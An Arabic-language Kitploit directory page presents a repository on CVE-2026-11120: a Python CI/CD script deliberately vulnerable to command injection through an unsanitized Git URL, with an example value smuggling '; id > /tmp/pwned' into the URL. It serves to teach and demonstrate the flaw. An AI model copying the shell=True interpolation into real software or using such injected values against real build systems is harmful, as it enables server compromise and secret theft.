Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline — يوضّح حقن الأوامر عبر عناوين Git غير المعقّمة في خطوط أنابيب CI/CD، بما في ذلك سكربت بناء هشّ ومثال استغلال لثغرة CVE حرجة. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline
تحليل الثغرات الأمنيةالاستغلالDevSecOpsالتعلم والتعليم
GitHubgeorge0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline

CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline

يوضّح حقن الأوامر عبر عناوين Git غير المعقّمة في خطوط أنابيب CI/CD، بما في ذلك سكربت بناء هشّ ومثال استغلال لثغرة CVE حرجة.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ 16 أياملم تتم المراجعة بعد

CVE-2026-11120 – حقن أوامر عبر عنوان Git في خط أنابيب CI/CD

كود البرنامج (Python)

root@kitploit:~
# cicd_build.py - Clones repository without sanitizing URL
import subprocess, sys

def clone_and_build(repo_url):
    # Vulnerability: repo_url can contain shell metacharacters
    cmd = f"git clone {repo_url} /tmp/repo"
    subprocess.check_call(cmd, shell=True)
    # Build steps...

if __name__ == '__main__':
    # Simulate attacker-controlled input
    malicious_url = "https://github.com/org/repo.git; id > /tmp/pwned"
    clone_and_build(malicious_url)

CVE-2026-11120 – حقن أوامر عبر عنوان Git في CI/CD

Severity: Critical

نظرة عامة

يستخدم سكربت خط أنابيب CI/CD عناوين مستودعات Git المقدمة من المستخدم دون تنقية في أمر shell. يمكن للمهاجم حقن أوامر shell عبر تضمين أحرف خاصة (مثل ; و&&) في العنوان، مما يؤدي إلى تنفيذ أوامر عشوائية على خادم البناء.

تفاصيل الثغرة

  • النوع: حقن أوامر
  • الأثر: اختراق البنية التحتية للبناء، وتسريب الأسرار.
  • السبب الجذري: يتم دمج عنوان المستودع مباشرةً في أمر shell دون تهريب أو تحقق من صحة الإدخال.

عرض الاستغلال

شغّل السكربت الضعيف:

root@kitploit:~
python cicd_build.py

ينفّذ الأمر id المحقون، مما ينشئ الملف /tmp/pwned.

تنزيل الأداة